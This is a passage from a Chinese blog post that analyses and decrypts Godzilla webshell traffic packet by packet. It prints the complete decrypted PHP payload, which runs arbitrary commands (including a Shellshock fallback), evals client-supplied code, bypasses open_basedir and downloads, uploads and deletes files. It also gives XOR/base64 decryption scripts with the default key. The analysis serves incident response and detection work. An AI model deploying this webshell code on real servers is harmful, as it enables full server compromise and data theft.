QRNDFhhVDksEQm47FRISFEETQxYXVRZNE1dDV1ReQVFaPmkWRRBCRWwzHjw%2FVEdaAkcKWQsQBV0VexpFUEEaEBJHEV8LV0sYGjRpERUSEhADShdTFhBfGABLEVBMGhsPbDlDFkUQBFcTEUdYFQ8SBFoTR19FDEJLFUsPVFsaFkcVQQpYAhlZGEVQSBocST8%2BQRNDFkUQQhgASxFQTG1CQRJbSxIHSRZdEhUMQ1EaFkcVQQpYAmtGUTwQSgo4OBIUQRMeO28QQhhBSwZFQEBcFEVRGkIAQ1k1a0RuOw%3D%3D')),$key);

源码如下


$parameters=array();
$_SES=array();
function run($pms){
    reDefSystemFunc();
    $_SES=&getSession();
    @session_start();
    $sessioId=md5(session_id());
    if (isset($_SESSION[$sessioId])){
        $_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId)));
    }
    @session_write_close();

    if (canCallGzipDecode()==1&&@isGzipStream($pms)){
        $pms=gzdecode($pms);
    }
    formatParameter($pms);

    if (isset($_SES["bypass_open_basedir"])&&$_SES["bypass_open_basedir"]==true){
        @bypass_open_basedir();
    }

    $result=evalFunc();

    if ($_SES!==null){
        session_start();
        $_SESSION[$sessioId]=base64_encode(S1MiwYYr(serialize($_SES),$sessioId));
        @session_write_close();
    }

    if (canCallGzipEncode()){
        $result=gzencode($result,6);
    }

    return $result;
}
function S1MiwYYr($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $D[$i] = $D[$i]^$K[($i+1)%15];
    }
    return $D;
}
function reDefSystemFunc(){
    if (!function_exists("file_get_contents")) {
        function file_get_contents($file) {
            $f = @fopen($file,"rb");
            $contents = false;
            if ($f) {
                do { $contents .= fgets($f); } while (!feof($f));
            }
            fclose($f);
            return $contents;
        }
    }
    if (!function_exists('gzdecode')&&function_existsEx("gzinflate")) {
        function gzdecode($data)
        {
            return gzinflate(substr($data,10,-8));
        }
    }
}
function &getSession(){
    global $_SES;
    return $_SES;
}
function bypass_open_basedir(){
    @$_FILENAME = @dirname($_SERVER['SCRIPT_FILENAME']);
    $allFiles = @scandir($_FILENAME);
    $cdStatus=false;
    if ($allFiles!=null){
        foreach ($allFiles as $fileName) {
            if ($fileName!="."&&$fileName!=".."){
                if (@is_dir($fileName)){
                    if (@chdir($fileName)===true){
                        $cdStatus=true;
                        break;
                    }
                }
            }

        }
    }
    if(!@file_exists('bypass_open_basedir')&&!$cdStatus){
        @mkdir('bypass_open_basedir');
    }
    if (!$cdStatus){
        @chdir('bypass_open_basedir');
    }
    @ini_set('open_basedir','..');
    @$_FILENAME = @dirname($_SERVER['SCRIPT_FILENAME']);
    @$_path = str_replace("\\",'/',$_FILENAME);
    @$_num = substr_count($_path,'/') + 1;
    $_i = 0;
    while($_i < $_num){
        @chdir('..');
        $_i++;
    }
    @ini_set('open_basedir','/');
    if (!$cdStatus){
        @rmdir($_FILENAME.'/'.'bypass_open_basedir');
    }
}
function formatParameter($pms){
    global $parameters;
    $index=0;
    $key=null;
    while (true){
        $q=$pms[$index];
        if (ord($q)==0x02){
            $len=bytesToInteger(getBytes(substr($pms,$index+1,4)),0);
            $index+=4;
            $value=substr($pms,$index+1,$len);
            $index+=$len;
            $parameters[$key]=$value;
            $key=null;
        }else{
            $key.=$q;
        }
        $index++;
        if ($index>strlen($pms)-1){
            break;
        }
    }
}
function evalFunc(){
    try{
        @session_write_close();
        $className=get("codeName");
        $methodName=get("methodName");
        $_SES=&getSession();
        if ($methodName!=null){
            if (strlen(trim($className))>0){
                if ($methodName=="includeCode"){
                    return includeCode();
                }else{
                    if (isset($_SES[$className])){
                        return eval($_SES[$className]);
                    }else{
                        return "{$className} no load";
                    }
                }
            }else{
                if (function_exists($methodName)){
                    return $methodName();
                }else{
                    return "function {$methodName} not exist";
                }
            }
        }else{
            return "methodName Is Null";
        }
    }catch (Exception $e){
        return "ERROR://".$e -> getMessage();
    }

}
function deleteDir($p){
    $m=@dir($p);
    while(@$f=$m->read()){
        $pf=$p."/".$f;
        @chmod($pf,0777);
        if((is_dir($pf))&&($f!=".")&&($f!="..")){
            deleteDir($pf);
            @rmdir($pf);
        }else if (is_file($pf)&&($f!=".")&&($f!="..")){
            @unlink($pf);
        }
    }
    $m->close();
    @chmod($p,0777);
    return @rmdir($p);
}
function deleteFile(){
    $F=get("fileName");
    if(is_dir($F)){
        return deleteDir($F)?"ok":"fail";
    }else{
        return (file_exists($F)?@unlink($F)?"ok":"fail":"fail");
    }
}
function setFileAttr(){
    $type = get("type");
    $attr = get("attr");
    $fileName = get("fileName");
    $ret = "Null";
    if ($type!=null&&$attr!=null&&$fileName!=null) {
        if ($type=="fileBasicAttr"){
            if (@chmod($fileName,convertFilePermissions($attr))){
                return "ok";
            }else{
                return "fail";
            }
        }else if ($type=="fileTimeAttr"){
            if (@touch($fileName,$attr)){
                return "ok";
            }else{
                return "fail";
            }
        }else{
            return "no ExcuteType";
        }
    }else{
        $ret="type or attr or fileName is null";
    }
    return $ret;
}
function fileRemoteDown(){
    $url=get("url");
    $saveFile=get("saveFile");
    if ($url!=null&&$saveFile!=null) {
        $data=@file_get_contents($url);
        if ($data!==false){
            if (@file_put_contents($saveFile,$data)!==false){
                @chmod($saveFile,0777);
                return "ok";
            }else{
                return "write fail";
            }
        }else{
            return "read fail";
        }
    }else{
        return "url or saveFile is null";
    }
}
function copyFile(){
    $srcFileName=get("srcFileName");
    $destFileName=get("destFileName");
    if (@is_file($srcFileName)){
        if (copy($srcFileName,$destFileName)){
            return "ok";
        }else{
            return "fail";
        }
    }else{
        return "The target does not exist or is not a file";
    }
}
function moveFile(){
    $srcFileName=get("srcFileName");
    $destFileName=get("destFileName");
    if (rename($srcFileName,$destFileName)){
        return "ok";
    }else{
        return "fail";
    }

}
function getBasicsInfo()
{
    $data = array();
    $data['OsInfo'] = @php_uname();
    $data['CurrentUser'] = @get_current_user();
    $data['CurrentUser'] = strlen(trim($data['CurrentUser'])) > 0 ? $data['CurrentUser'] : 'NULL';
    $data['REMOTE_ADDR'] = @$_SERVER['REMOTE_ADDR'];
    $data['REMOTE_PORT'] = @$_SERVER['REMOTE_PORT'];
    $data['HTTP_X_FORWARDED_FOR'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $data['HTTP_CLIENT_IP'] = @$_SERVER['HTTP_CLIENT_IP'];
    $data['SERVER_ADDR'] = @$_SERVER['SERVER_ADDR'];
    $data['SERVER_NAME'] = @$_SERVER['SERVER_NAME'];
    $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT'];
    $data['disable_functions'] = @ini_get('disable_functions');
    $data['disable_functions'] = strlen(trim($data['disable_functions'])) > 0 ? $data['disable_functions'] : @get_cfg_var('disable_functions');
    $data['Open_basedir'] = @ini_get('open_basedir');
    $data['timezone'] = @ini_get('date.timezone');
    $data['encode'] = @ini_get('exif.encode_unicode');
    $data['extension_dir'] = @ini_get('extension_dir');
    $data['sys_get_temp_dir'] = @sys_get_temp_dir();
    $data['include_path'] = @ini_get('include_path');
    $data['DOCUMENT_ROOT'] = $_SERVER['DOCUMENT_ROOT'];
    $data['PHP_SAPI'] = PHP_SAPI;
    $data['PHP_VERSION'] = PHP_VERSION;
    $data['PHP_INT_SIZE'] = PHP_INT_SIZE;
    $data['canCallGzipDecode'] = canCallGzipDecode();
    $data['canCallGzipEncode'] = canCallGzipEncode();
    $data['session_name'] = @ini_get("session.name");
    $data['session_save_path'] = @ini_get("session.save_path");
    $data['session_save_handler'] = @ini_get("session.save_handler");
    $data['session_serialize_handler'] = @ini_get("session.serialize_handler");
    $data['user_ini_filename'] = @ini_get("user_ini.filename");
    $data['memory_limit'] = @ini_get('memory_limit');
    $data['upload_max_filesize'] = @ini_get('upload_max_filesize');
    $data['post_max_size'] = @ini_get('post_max_size');
    $data['max_execution_time'] = @ini_get('max_execution_time');
    $data['max_input_time'] = @ini_get('max_input_time');
    $data['default_socket_timeout'] = @ini_get('default_socket_timeout');
    $data['mygid'] = @getmygid();
    $data['mypid'] = @getmypid();
    $data['SERVER_SOFTWAREypid'] = @$_SERVER['SERVER_SOFTWARE'];
    $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT'];
    $data['loaded_extensions'] = @implode(',', @get_loaded_extensions());
    $data['short_open_tag'] = @get_cfg_var('short_open_tag');
    $data['short_open_tag'] = @(int)$data['short_open_tag'] == 1 ? 'true' : 'false';
    $data['asp_tags'] = @get_cfg_var('asp_tags');
    $data['asp_tags'] = (int)$data['asp_tags'] == 1 ? 'true' : 'false';
    $data['safe_mode'] = @get_cfg_var('safe_mode');
    $data['safe_mode'] = (int)$data['safe_mode'] == 1 ? 'true' : 'false';
    $data['CurrentDir'] = str_replace('\\', '/', @dirname($_SERVER['SCRIPT_FILENAME']));
    $SCRIPT_FILENAME=@dirname($_SERVER['SCRIPT_FILENAME']);
    $data['FileRoot'] = '';
    if (substr($SCRIPT_FILENAME, 0, 1) != '/') {foreach (range('A', 'Z') as $L){ if (@is_dir("{$L}:")){ $data['FileRoot'] .= "{$L}:/;";}};};
    $data['FileRoot'] = (strlen(trim($data['FileRoot'])) > 0 ? $data['FileRoot'] : '/');
    $data['FileRoot']= substr_count($data['FileRoot'],substr($SCRIPT_FILENAME, 0, 1))<=0?substr($SCRIPT_FILENAME, 0, 1).":/":$data['FileRoot'];
    $result="";
    foreach($data as $key=>$value){
        $result.=$key." : ".$value."\n";
    }
    return $result;
}
function getFile(){
    $dir=get('dirName');
    $dir=(strlen(@trim($dir))>0)?trim($dir):str_replace('\\','/',dirname(__FILE__));
    $dir.="/";
    $path=$dir;
    $allFiles = @scandir($path);
    $data="";
    if ($allFiles!=null){
        $data.="ok";
        $data.="\n";
        $data.=$path;
        $data.="\n";
        foreach ($allFiles as $fileName) {
            if ($fileName!="."&&$fileName!=".."){
                $fullPath = $path.$fileName;
                $lineData=array();
                array_push($lineData,$fileName);
                array_push($lineData,@is_file($fullPath)?"1":"0");
                array_push($lineData,date("Y-m-d H:i:s", @filemtime($fullPath)));
                array_push($lineData,@filesize($fullPath));
                $fr=(@is_readable($fullPath)?"R":"").(@is_writable($fullPath)?"W":"").(@is_executable($fullPath)?"X":"");
                array_push($lineData,(strlen($fr)>0?$fr:"F"));
                $data.=(implode("\t",$lineData)."\n");
            }

        }
    }else{
        return "Path Not Found Or No Permission!";
    }
    return $data;
}
function readFileContent(){
    $fileName=get("fileName");
    if (@is_file($fileName)){
        if (@is_readable($fileName)){
            return file_get_contents($fileName);
        }else{
            return "No Permission!";
        }
    }else{
        return "File Not Found";
    }
}
function uploadFile(){
    $fileName=get("fileName");
    $fileValue=get("fileValue");
    if (@file_put_contents($fileName,$fileValue)!==false){
        @chmod($fileName,0777);
        return "ok";
    }else{
        return "fail";
    }
}
function newDir(){
    $dir=get("dirName");
    if (@mkdir($dir,0777,true)!==false){
        return "ok";
    }else{
        return "fail";
    }
}
function newFile(){
    $fileName=get("fileName");
    if (@file_put_contents($fileName,"")!==false){
        return "ok";
    }else{
        return "fail";
    }
}

function function_existsEx($functionName){
    $d=explode(",",@ini_get("disable_functions"));
    if(empty($d)){
        $d=array();
    }else{
        $d=array_map('trim',array_map('strtolower',$d));
    }
    return(function_exists($functionName)&&is_callable($functionName)&&!in_array($functionName,$d));
}

function execCommand(){
    @ob_start();
    $cmdLine=get("cmdLine");
    $d=__FILE__;
    $cmdLine=substr($d,0,1)=="/"?"-c \"{$cmdLine}\"":"/c \"{$cmdLine}\"";
    if(substr($d,0,1)=="/"){
        @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    }else{
        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    $executeFile=substr($d,0,1)=="/"?"sh":"cmd";

    $cmdLine="{$executeFile} {$cmdLine}";
    $cmdLine=$cmdLine." 2>&1";
    $ret=0;

    if (!function_exists("runshellshock")){
        function runshellshock($d, $c) {
            if (substr($d, 0, 1) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) {
                if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                    $tmp = tempnam(sys_get_temp_dir(), 'as');
                    putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                    if (function_existsEx('error_log')) {
                        error_log("a", 1);
                    } else {
                        mail("a@127.0.0.1", "", "", "-bv");
                    }
                } else {
                    return False;
                }
                $output = @file_get_contents($tmp);
                @unlink($tmp);
                if ($output != "") {
                    print($output);
                    return True;
                }
            }
            return False;
        };
    }

    if(function_existsEx('system')){
        @system($cmdLine,$ret);
    }elseif(function_existsEx('passthru')){
        @passthru($cmdLine,$ret);
    }elseif(function_existsEx('shell_exec')){
        print(@shell_exec($cmdLine));
    }elseif(function_existsEx('exec')){
        @exec($cmdLine,$o,$ret);
        print(join("\n",$o));
    }elseif(function_existsEx('popen')){
        $fp=@popen($cmdLine,'r');
        while(!@feof($fp)){
            print(@fgets($fp,2048));
        }
        @pclose($fp);
    }elseif(function_existsEx('proc_open')){
        $p = @proc_open($cmdLine, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while(!@feof($io[1])){
            print(@fgets($io[1],2048));
        }
        while(!@feof($io[2])){
            print(@fgets($io[2],2048));
        }
        @fclose($io[1]);
        @fclose($io[2]);
        @proc_close($p);
    }elseif(runshellshock($d, $cmdLine)) {
        print($ret);
    }elseif(substr($d,0,1)!="/" && @class_exists("COM")){
        $w=new COM('WScript.shell');
        $e=$w->exec($cmdLine);
        $so=$e->StdOut();
        print($so->ReadAll());
        $se=$e->StdErr();
        print($se->ReadAll());
    }else{
        return "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock is available";
    }
    print(($ret!=0)?"ret={$ret}":"");
    $result = @ob_get_contents();
    @ob_end_clean();
    return $result;
}
function execSql(){
    $dbType=get("dbType");
    $dbHost=get("dbHost");
    $dbPort=get("dbPort");
    $username=get("dbUsername");
    $password=get("dbPassword");
    $execType=get("execType");
    $execSql=get("execSql");
    function  mysql_exec($host,$port,$username,$password,$execType,$sql){
        // 创建连接
        $conn = new mysqli($host,$username,$password,"",$port);
        // Check connection
        if ($conn->connect_error) {
            return $conn->connect_error;
        }

        $result = $conn->query($sql);
        if ($conn->error){
            return $conn->error;
        }
        $result = $conn->query($sql);
        if ($execType=="update"){
            return "Query OK, "+$conn->affected_rows+" rows affected";
        }else{
            $data="ok\n";
            while ($column = $result->fetch_field()){
                $data.=base64_encode($column->name)."\t";
            }
            $data.="\n";
            if ($result->num_rows > 0) {
                // 输出数据
                while($row = $result->fetch_assoc()) {
                    foreach ($row as $value){
                        $data.=base64_encode($value)."\t";
                    }
                    $data.="\n";
                }
            }
            return $data;
        }
    }
    function pdoExec($databaseType,$host,$port,$username,$password,$execType,$sql){
        try {
            $conn = new PDO("{$databaseType}:host=$host;port={$port};", $username, $password);

            // 设置 PDO 错误模式为异常
            $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

            if ($execType=="update"){
                return "Query OK, "+$conn->exec($sql)+" rows affected";
            }else{
                $data="ok\n";
                $stm=$conn->prepare($sql);
                $stm->execute();
                $row=$stm->fetch(PDO::FETCH_ASSOC);
                $_row="\n";
                foreach (array_keys($row) as $key){
                    $data.=base64_encode($key)."\t";
                    $_row.=base64_encode($row[$key])."\t";
                }
                $data.=$_row."\n";
                while ($row=$stm->fetch(PDO::FETCH_ASSOC)){
                    foreach (array_keys($row) as $key){
                        $data.=base64_encode($row[$key])."\t";
                    }
                    $data.="\n";
                }
                return $data;
            }

        }
        catch(PDOException $e)
        {
            return $e->getMessage();
        }
    }
    if ($dbType=="mysql"){
        if (extension_loaded("mysqli")){
            return mysql_exec($dbHost,$dbPort,$username,$password,$execType,$execSql);
        }else if (extension_loaded("pdo")){
            return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$execSql);
        }else{
            return "no extension";
        }
    }else if (extension_loaded("pdo")){
        return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$execSql);
    }else{
        return "no extension";
    }
    return "no extension";

}
function base64Encode($data){
    return base64_encode($data);
}
function test(){
    return "ok";
}
function get($key){
    global $parameters;
    if (isset($parameters[$key])){
        return $parameters[$key];
    }else{
        return null;
    }
}
function getAllParameters(){
    global $parameters;
    return $parameters;
}
function includeCode(){
    $classCode=get("binCode");
    $codeName=get("codeName");
    $_SES=&getSession();
    $_SES[$codeName]=$classCode;
    return "ok";
}
function base64Decode($string){
    return base64_decode($string);
}
function convertFilePermissions($fileAttr){
    $mod=0;
    if (strpos($fileAttr,'R')!==false){
        $mod=$mod+0444;
    }
    if (strpos($fileAttr,'W')!==false){
        $mod=$mod+0222;
    }
    if (strpos($fileAttr,'X')!==false){
        $mod=$mod+0111;
    }
    return $mod;
}
function close(){
    @session_start();
    $_SES=&getSession();
    $_SES=null;
    if (@session_destroy()){
        return "ok";
    }else{
        return "fail!";
    }
}

function bigFileDownload(){
    $mode=get("mode");
    $fileName=get("fileName");
    $readByteNum=get("readByteNum");
    $position=get("position");
    if ($mode=="fileSize"){
        if (@is_readable($fileName)){
            return @filesize($fileName)."";
        }else{
            return "not read";
        }
    }elseif ($mode=="read"){

        if (function_existsEx("fopen")&&function_existsEx("fread")&&function_existsEx("fseek")){
            $handle=fopen($fileName,"ab+");
            fseek($handle,$position);
            $data=fread($handle,$readByteNum);
            @fclose($handle);
            if ($data!==false){
                return $data;
            }else{
                return "cannot read file";
            }
        }else if (function_existsEx("file_get_contents")){
            return file_get_contents($fileName,false,null,$position,$readByteNum);
        }else{
            return "no function";
        }

    }else{
        return "no mode";
    }
}

function bigFileUpload(){
    $fileName=get("fileName");
    $fileContents=get("fileContents");
    $position=get("position");
    if(function_existsEx("fopen")&&function_existsEx("fwrite")&&function_existsEx("fseek")){
        $handle=fopen($fileName,"ab+");
        if ($handle!==false){
            fseek($handle,$position);
            $len=fwrite($handle,$fileContents);
            if ($len!==false){
                return "ok";
            }else{
                return "cannot write file";
            }
            @fclose($handle);
        }else{
            return "cannot open file";
        }
    }else if (function_existsEx("file_put_contents")){
        if (file_put_contents($fileName,$fileContents,FILE_APPEND)!==false){
            return "ok";
        }else{
            return "writer fail";
        }
    }else{
        return "no function";
    }
}
function canCallGzipEncode(){
    if (function_existsEx("gzencode")){
        return "1";
    }else{
        return "0";
    }
}
function canCallGzipDecode(){
    if (function_existsEx("gzdecode")){
        return "1";
    }else{
        return "0";
    }
}
function bytesToInteger($bytes, $position) {
    $val = 0;
    $val = $bytes[$position + 3] & 0xff;
    $val <<= 8;
    $val |= $bytes[$position + 2] & 0xff;
    $val <<= 8;
    $val |= $bytes[$position + 1] & 0xff;
    $val <<= 8;
    $val |= $bytes[$position] & 0xff;
    return $val;
}
function isGzipStream($bin){
    if (strlen($bin)>=2){
        $bin=substr($bin,0,2);
        $strInfo = @unpack("C2chars", $bin);
        $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
        switch ($typeCode) {
            case 31139:
                return true;
                break;
            default:
                return false;
        }
    }else{
        return false;
    }
}
function getBytes($string) {
    $bytes = array();
    for($i = 0; $i < strlen($string); $i++){
        array_push($bytes,ord($string[$i]));
    }
    return $bytes;
}

第二个包

Request解密脚本和第一个包的Request一样
在这里插入图片描述
看到乱码了没事
根据大佬的文章分析
假设原始POST请求参数为:{‘methodName’: ‘getFile’, ‘dirName’: ‘D:/WWW/shells/’}
加密之后是这样的
在这里插入图片描述据此分析我们加密包为{‘methodName’: ‘test’}
在这里插入图片描述

Response解密脚本

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
// 原来的数据去掉前十六位和后十六位然后解密
echo gzdecode(encode(base64_decode('DlMRWA1cL1gOVDc2MjRhRwZFEQ=='),$key));

结果为ok

第三个包

Request解密脚本和第二个包的Request一样
所以结果是{‘methodName’: ‘getBasicsInfo’}
在这里插入图片描述

Response解密脚本同第二个包的脚本
注意去掉前16后16然后再解密

在这里插入图片描述

VVeaker
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
哥斯拉v4.0流量解密
热爱学习,喜欢折腾!
10-09 1974
哥斯拉(Godzilla)是一款国内流行且优秀的红队 webshell 权限管理工具,使用 java 开发的可视化客户端,shell 支持 java、php、asp 环境,通信流量使用 AES 算法加密,具有文件管理、数据库操作、命令执行、内存马、隧道反弹等后门功能。
kingkong:解密哥斯拉webshell管理工具流量
04-16
kingkong 解密哥斯拉Godzilla-V2.96 webshell管理工具流量 目前只支持jsp类型的webshell流量解密 Usage 获取攻击者上传到服务器的webshell样本 获取wireshark之类的流量包,一般甲方有科来之类的全流量镜像设备,联系运维人员获取,这里以test.papng为例。 导出所有http对象,放置到文件夹 编辑kingkong.py脚本,找到#config这行,配置获取到的样本password、key,以及刚才的文件夹路径 py -2 kingkong.py Config #config #配置webshell的key key = '3c6e0b8a9c15224a' #配置webshell的password password = 'pass' #配置wireshark导出http对象的路径 filepath = '.' #配置是否为jsp+b
攻击工具分析丨哥斯拉v4.0流量解密及特征流量提取
wangluoanquan111的博客
08-19 1434
哥斯拉是一款webshell权限管理工具,由java语言开发。它的特点有:全部类型的shell能绕过市面大部分的静态查杀、流量加密能绕过过市面绝大部分的流量Waf、Godzilla自带的插件是冰蝎、蚁剑不能比拟的。它能实现的功能除了传统的命令执行、文件管理、数据库管理之外,根据shell类型的不同还包括了:MSF联动、绕过OpenBasedir、ZIP压缩、ZIP解压、代码执行、绕过。
NSSCTFmisc刷题记录
最新发布
fivesheeptree的博客
07-14 457
NSSCTFmisc刷题记录
初识哥斯拉流量
weixin_59343712的博客
07-11 599
到公司实习之后玩了玩应急响应平台流量监测平台,发现基于哥斯拉流量来进行上传攻击取得成功案例有多个,觉得有必要了解一下什么是哥斯拉流量,下面写一下对于哥斯拉流量的认识名叫“哥斯拉”的webshell管理工具,与冰蝎类似,哥斯拉也采用了加密流量通信来躲避WAF等安全设备的检测,另外该工具自带了一些插件模块,实现了写内存webshell、与Meterpreter联动、bypass open_basedir等功能。
哥斯拉Godzilla使用中基于PHP加密流量分析
zlloveyouforever的博客
02-23 2569
对webshell连接工具哥斯拉在连接过程中的简单流量分析。
(菜刀,蚁剑,冰蝎,哥斯拉流量特征分析总结
weixin_54603520的博客
05-15 4065
在红蓝攻防的过程中,webshell工具的流量特征分析一直时蓝队成员需要关注的重点。
哥斯拉流量webshell分析-->ASP/PHP
qq_42430287的博客
03-13 2575
哥斯拉流量webshell分析-->ASP流量分析(其他流量未实操)
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
哥斯拉3.03.rar
08-12
webshell工具,哥斯拉
哥斯拉4.0.1.rar
03-05
哥斯拉,好用的用后门软件
php 木马的分析(加密破解)
12-17
这使得我们能够在PHP环境中运行这个脚本,将Base64编码的木马还原PHP源代码,并将其保存到文件中。 解码后,我们得到了如下所示的PHP明文文件: ```php error_reporting(7); ob_start(); $mtime = explode(' ', ...
常见webshell工具流量特征分析(哥斯拉、冰蝎、蚁剑、菜刀)
weixin_45971758的博客
06-23 3417
message 是一段超极长的字符串,分析冰蝎请求中的 PHP 代码,发现他就是 content 经过 base64 -> aes 加密后生成的,作用和请求中的 content 一致都是绕过 $Content-Length。冰蝎与webshell建立连接的同时,javaw也与目的主机建立tcp连接,每次连接使用本地端口在49700左右,每连接一次,每建立一次新的连接,端口就依次增加。content:“浏览器版本”。流量解密过程: 解AES密钥为(连接密码的MD5的前16位) --> 解base64两次。
公司某应用服务器被挂挖矿病毒处理流程
weixin_41876359的博客
07-29 2490
公司某应用服务器被挂挖矿病毒处理流程 2021年7月20日 本来正在高高兴兴做项目,突然接到一个老客户的电话,跟我说他们的服务器被人植入了挖矿病毒,cpu爆满。 好家伙,客户上来给我发了个病毒扫描文件【听说是发现服务器卡顿后,安装了火绒企业版(收费)可以扫描linux主机,看来效果还不错,可以扫到很多东西】 看了下看服务器已经完全沦陷了 看了下情况,服务器目前已经是在自动连接矿池挖矿了。 1.关闭服务器连接外网的权限。 可以看到连接是从服务器主动连接到矿池的,首先关闭掉服务器连接外网的流量,不让服务
流量分析】Godzilla分析
sinat_31884905的博客
08-29 4532
哥斯拉客户端使用JAVA语言编写,在默认的情况下,如果不修改User-Agent,User-Agent会类似于Java/1.8.0_121(具体什么版本取决于JDK环境版本)。但是哥斯拉支持自定义HTTP头部,这个默认特征是可以很容易去除的。Accept为text/html, image/gif, image/jpeg, *;q=.2, /;q=.2哥斯拉的作者应该还没有意识到,在请求包的Cookie中有一个非常致命的特征,最后的分号。
哥斯拉木马解析 + bypass 免杀代码分析+回调webshell
m0_64180167的博客
12-28 2216
这里也是跟着大佬走的这里首先我是去看了看bypass 学习一下然后我们就可以发现对比我这里将混淆什么的都去掉下面是原版的哥斯拉能发现 确实通过特殊的编码和对字符串的处理,实现bypass落地的时候确实火绒扫不出来我们将两种放到 阿里云中查看一下可以发现已经被识别到了(肯定是被抓特征了)这里我们首先就开始分析一下哥斯拉php木马类别是 php xor base64这里是基本的代码查看 这里有些是我自己加上去进行判断的这里给出一下大致流程顺便给出session的解释。
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本
C20220511的博客
07-19 2118
本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla,对它们的加解密方式进行识别和分析【附简易解密脚本】,希望能在行动中助大家一臂之力。
如何用哥斯拉判断流量类型
05-24
哥斯拉是一款流量分析工具,可以根据流量的不同特征来判断流量类型。以下是一些常见的流量类型及其特征: 1. HTTP 流量:HTTP 流量常见于 Web 应用程序,其特征为在 TCP 连接上进行通信,并使用明文或加密的 HTTP 协议进行数据传输。 2. HTTPS 流量:HTTPS 流量与 HTTP 流量类似,但使用 SSL 或 TLS 加密协议进行数据传输。 3. SSH 流量:SSH 流量通常用于远程访问和管理服务器,其特征为在 TCP 连接上进行通信,并使用 SSH 协议进行加密数据传输。 4. FTP 流量:FTP 是一种用于文件传输的协议,其特征为在 TCP 连接上进行通信,并使用 FTP 协议进行数据传输。 5. SMTP 流量:SMTP 是一种用于电子邮件传输的协议,其特征为在 TCP 连接上进行通信,并使用 SMTP 协议进行数据传输。 通过分析流量的源地址、目的地址、端口、协议以及数据包大小等特征,哥斯拉可以判断流量类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值